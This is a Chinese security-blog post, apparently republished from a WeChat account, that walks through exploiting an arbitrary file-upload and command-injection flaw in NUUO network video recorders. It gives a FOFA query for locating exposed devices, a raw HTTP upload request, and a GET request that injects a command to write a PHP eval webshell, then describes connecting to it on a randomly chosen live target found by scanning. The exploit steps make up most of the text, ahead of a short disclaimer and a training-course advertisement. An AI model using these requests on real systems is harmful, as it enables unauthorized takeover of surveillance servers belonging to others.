产品简介
产品简介
NUUO网络视频录像机(Network Video Recorder,简称NVR)是NUUO Inc.生产的一种专业视频监控设备,它广泛应用于零售、交通教育、政府和银行等多个领域。能够同时管理多个!P摄像头,实现视频录制、存储、回放及远程监控等功能。,它采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求。
漏洞概述
漏洞概述
NUUO网络视频录像机 upload.php 存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShel,进一步控制服务器权限。
FOFA
FOFA
title="Network Video Recorder Login"
漏洞复现
漏洞复现
POST /upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------ok4o88lom
----------ok4o88lom
Content-Disposition: form-data; name="userfile"; filename="test.php"
<?php phpinfo(); ;?>
----------ok4o88lom--
验证
如果没有真实的环境和深入的手法,我估计你们也很难理解,来吧,小龙带你们整
实战复现
实战复现
1、首先利用Hw100进行漏洞检测
检测出来之后去到bp然后随机挑选一位幸运嘉宾
可以看到命令成功回显,那么我们可以尝试写入一句话木马来getshell
GET /__debugging_center_utils___.php?log=;echo+'<%3fphp+%40eval($_POST[cmd])%3b%3f>'>a123.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
发送完数据包之后就可以尝试蚁剑连接
目标url
免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
我们红岸基地网安教学,只有两个老师、一个是赵小龙老师、一个是陈师傅。可以联系微信:Changethe_one,只要你提供目前的现状与学历,陈老师可以免费帮大家做职业规划。
Changethe_one
扫码添加,提升自己!
👇👇👇
原文始发于微信公众号(暗影网安实验室):NUUO网络视频录像机 upload.php 任意文件上传漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论